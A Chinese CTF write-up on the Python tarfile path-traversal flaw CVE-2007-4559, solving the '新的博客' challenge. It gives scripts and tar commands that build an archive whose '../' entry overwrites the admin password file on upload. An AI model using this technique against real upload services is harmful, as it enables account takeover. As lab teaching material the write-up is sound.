tar文件覆盖漏洞 CVE-2007-4559

文章目录

    • 前言
    • 原理
    • 例题 [NSSRound#7 Team]新的博客
      • 方法一 手搓文件名
      • 方法二 python脚本


前言

做到[NSSRound#6 Team]check(Revenge)时发现是tar文件覆盖,但是对概念和执行过程理解不够深就光光记住脚本,所以在做本题[NSSRound#7 Team]新的博客时打算重新梳理该漏洞执行过程

原理

Python 中 tarfile 模块中的extract、extractFile和extractall 函数中的目录遍历漏洞 允许 用户协助的远程攻击者通过 TAR 存档文件名中的…和/遍历目录 和 写入/覆盖任意文件

关键代码

tar = tarfile.open(file_save_path, "r")
tar.extractall(app.config['UPLOAD_FOLDER'])

extractall函数如果结合包含…/的文件名时可以实现文件覆盖漏洞

例题 [NSSRound#7 Team]新的博客

打开题目,发现有两个跳转的网页
第一个提示要用admin用户登录但是密码经过sha512加密,然后就是泄露了源码地址
tar文件覆盖漏洞 CVE-2007-4559_第1张图片第二个网页提示hacker打不开,那么应该是要admin才行

我们把字符串解码一下
tar文件覆盖漏洞 CVE-2007-4559_第2张图片得到源码文件夹,文件结构大概如下
tar文件覆盖漏洞 CVE-2007-4559_第3张图片
当然此文件夹给了加密后的密码,但是也提示我们不用去爆破
这里我们先随便注册用户1试试,发现存在tar文件上传
tar文件覆盖漏洞 CVE-2007-4559_第4张图片
提示也说了这个是恢复备份用的,那么思路就是tar文件覆盖

方法一 手搓文件名

我们已知userinfo.json存放着用户和加密的密码,那么我们可以尝试自己加密123456去覆盖admin原本的密码从而实现登录。加密脚本如下

import hashlib
import json

password='123456'
with open('userinfo.json','wb') as file:
    file.write(json.dumps({'admin':hashlib.sha512(password.encode('utf-8')).hexdigest()}).encode('utf-8'))

我们覆盖的路径为/app/conf/userinfo.json,但是我们发现要目录穿越

因为我们以用户1登录后,参考前文给的文件结构可知道需要被覆盖路径为1/../../app/conf/userinfo.json,也就是说我们创建的文件名为1/../../app/conf/userinfo.json。在linux下构建文件夹结构,然后将上述脚本生成的userinfo.json进行tar压缩

tar -czvf upload.tar.gz userinfo.json

然后我们在userData文件夹下,执行tar命令构造出覆盖路径的文件名

tar cPzvf upload.tar.gz 1/../../conf/userinfo.json

tar文件覆盖漏洞 CVE-2007-4559_第5张图片

方法二 python脚本

import os, hashlib, json
 
username = '1' # 你注册时用的用户名,尽量别有奇怪的符号
admin_passwd = '123456' # 之后要使用admin账户登陆时的密码
 
os.makedirs('conf')
os.makedirs(os.sep.join([os.getcwd(), 'userData', username]))
with open(os.sep.join([os.getcwd(), 'conf', 'userinfo.json']), 'wb') as tFile:
    tFile.write(json.dumps({'admin': hashlib.sha512(admin_passwd.encode('utf-8')).hexdigest()}).encode('utf-8'))
userDataDir = os.sep.join([os.getcwd(), 'userData'])
os.system(f'cd "{userDataDir}" && tar cPzvf upload.tar.gz {username}/../../conf/userinfo.json')

然后我们登录用户1,上传生成的tar文件
然后退出,用密码123456登录即可得到flag
tar文件覆盖漏洞 CVE-2007-4559_第6张图片

你可能感兴趣的:(安全,网络,web安全,学习,python)